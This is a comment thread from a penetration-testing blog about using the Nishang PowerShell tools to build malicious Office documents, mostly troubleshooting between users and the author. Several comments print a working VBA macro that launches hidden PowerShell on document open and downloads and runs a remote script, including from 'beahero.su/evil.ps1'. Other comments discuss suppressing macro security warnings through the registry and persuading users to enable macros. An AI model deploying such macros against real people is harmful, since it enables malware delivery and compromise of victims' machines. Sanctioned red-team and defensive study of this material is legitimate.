Comments on Lab of a Penetration Tester: Using PowerShell for Client Side Attacks

Anonymous, 2014-12-07 18:36 +05:30:
I tried your fix Nikhil but still the same issue :-(

PS: I have MS Office 2010 on Win 7.

wawa, 2014-12-07 22:48 +05:30:
Hello,

Thx for your work!
I have tried your fix and I have the same issue:
- VMware VM, Win7 Ultimate
- Office 2010
- PS Version 2

Nikhil SamratAshok Mittal, 2014-12-08 01:36 +05:30:
Hi,
It has been fixed. Please update your repository. Please respond if it fixes your problem.

Nikhil SamratAshok Mittal, 2014-12-08 01:36 +05:30:
Please check now. A fix has been pushed.

Nikhil SamratAshok Mittal, 2014-12-08 01:38 +05:30:
Please update your repo and check.

Anonymous, 2014-12-09 00:29 +05:30:
Fixed! Thanks a lot!

wawa, 2014-12-09 17:07 +05:30:
Great! It works, thx and congratulations.

Anonymous, 2015-02-28 15:08 +05:30:
Hello.
Thanks for your work.
I have a problem with a VBA macro in a docx file.
I use Win 8.1 64 bit, Microsoft Office 2013.

    Public Function Execute() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://evil.ps1'));", Null, objConfig, intProcessID
    End Function

Error in line Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2"):
Run-time error '-2147217406 (80041002)':
automation error

Maybe you can help me?

Nikhil SamratAshok Mittal, 2015-02-28 15:22 +05:30:
Thanks for reporting. Are you using this exact macro? If yes, there is no proper URL being passed to the macro and this could be the reason.

If not, let me try to reproduce this. I didn't test on Windows 8.1.

Anonymous, 2015-02-28 15:29 +05:30:
The real macro is:

    Sub Document_Open()
        Execute
    End Sub

    Public Function Execute() As Variant
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objWMIService = GetObject("WinMgmts:{impersonationLevel=impersonate}!\\.\Root\CIMv2")

        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://beahero.su/evil.ps1'));", Null, objConfig, intProcessID
    End Function

Do I need a special PS script in evil.ps1?
I use only one line: start ./notepad
I did it only as an example for me.
Thank you.

Nikhil SamratAshok Mittal, 2015-02-28 15:39 +05:30:
Your PowerShell script is trying to use Set-ExecutionPolicy, which needs elevated privileges. That seems to be the culprit. You don't need that as ExecutionPolicy is already being bypassed. Remove it. Also, try using simple PowerShell commands for testing.

Anonymous, 2015-02-28 21:35 +05:30:
What simple PS command do you mean?
Thank you for attention.

Nikhil SamratAshok Mittal, 2015-02-28 22:51 +05:30:
Try anything like Get-Process, $PsVersionTable, Get-Service etc.

Anonymous, 2015-03-05 03:16 +05:30:
Hey! Awesome work! Love your blog and the awesome things you are doing in PowerShell!

Just a quick fix on your code: in your code for "Out-Excel" and "powerpreter", when you create the variable $Payload for the -PayloadURL, you have the syntax in the code as:

    objProcess.Create '$Payload', Null, objConfig, intProcessID

The single quotes cause the payload to fail, so I changed it to double quotes:

    objProcess.Create "$Payload", Null, objConfig, intProcessID

and that worked perfectly! I just wanted to let you know. Keep up the awesome work!

Nikhil SamratAshok Mittal, 2015-03-05 12:00 +05:30:
Thank you very much for reporting this. It has been raised as a bug and fixed.
https://github.com/samratashok/nishang/issues/9

Anonymous, 2015-06-09 18:58 +05:30:
Hello Nikhil, is your script supposed to work on certain Windows/Office/PowerShell versions? I tried the updated release but I got the below error.

I'm using Windows 7, Office 2007.

    PS C:\Users\hkhrais> $PSVersionTable.PSVersion

    Major  Minor  Build  Revision
    -----  -----  -----  --------
    2      0      -1     -1

    PS C:\Users\hkhrais\Desktop> Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process
    "
    Exception setting "DisplayAlerts": "Cannot convert value "False" to type "Microsoft.Office.Interop.Word.WdAlertLevel".
    Error: "Invalid cast from 'System.Boolean' to 'Microsoft.Office.Interop.Word.WdAlertLevel'.""
    At C:\Users\hkhrais\Desktop\Out-Word.ps1:105 char:15
    + $Word. <<<< DisplayAlerts = $False
        + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
        + FullyQualifiedErrorId : PropertyAssignmentException

    Argument: '1' should be a System.Management.Automation.PSReference. Use [ref].
    At C:\Users\hkhrais\Desktop\Out-Word.ps1:192 char:24
    + $Doc.Saveas <<<< ($OutputFile, 0)
        + CategoryInfo          : NotSpecified: (:) [], MethodException
        + FullyQualifiedErrorId : NonRefArgumentToRefParameterMsg

    Saved to file C:\Users\hkhrais\Desktop\Salary_Details.doc
    0

Nikhil SamratAshok Mittal, 2015-06-09 19:44 +05:30:
Can you check it on a machine with PowerShell v3? I am unable to reproduce the error.

Anonymous, 2015-06-09 23:58 +05:30:
I upgraded my Office to 2010. It doesn't show any error message but I don't see any output, i.e. the salary.doc is not getting exported :( Any idea how to troubleshoot further?

Anonymous, 2015-06-10 00:23 +05:30:
Well, interestingly it's working now; looks like upgrading Office resolved the problem. I just have a question on the security warning: per the slides, the script automatically disables it via registry keys, but that's not the case here, as I'm still able to see the pop-up warning message about the macro.

Nikhil SamratAshok Mittal, 2015-06-10 01:09 +05:30:
Interestingly, my test machine was Office 2007 and PowerShell v3. Anyway, good that you got it working. The warning should not be there. Are you using the -RemainSafe option?

Anonymous, 2015-06-10 12:44 +05:30:
No, I don't, but it looks like the Trust Center is the one making this alert.
I tested on
Windows Server 2008 R2 running Office 2010
Windows 7 running Office 2010
Windows 7 running Office 2007

https://support.office.com/en-sg/article/Enable-or-disable-macros-in-Office-documents-7b4fdd2e-174f-47e2-9611-9efe4f860b12#bm3

Anonymous, 2015-06-10 13:06 +05:30:
Well, I think I figured out the answer, it's just right here:

https://enigma0x3.wordpress.com/2014/01/23/maintaining-access-with-normal-dotm/

The warning will still show up and we need to have a way to convince the user to do it ... please correct me if I'm wrong.

Nikhil SamratAshok Mittal, 2015-06-10 13:31 +05:30:
If you are able to execute Out-Word.ps1 on the target there would be no warning. Out-Word changes registry settings related to the Trust Center.

But if you execute a document generated by Out-Word on a target there would be warnings. Just checked it for Office 2007.

Anonymous, 2015-06-10 14:21 +05:30:
Got it .. thanks for your clarification.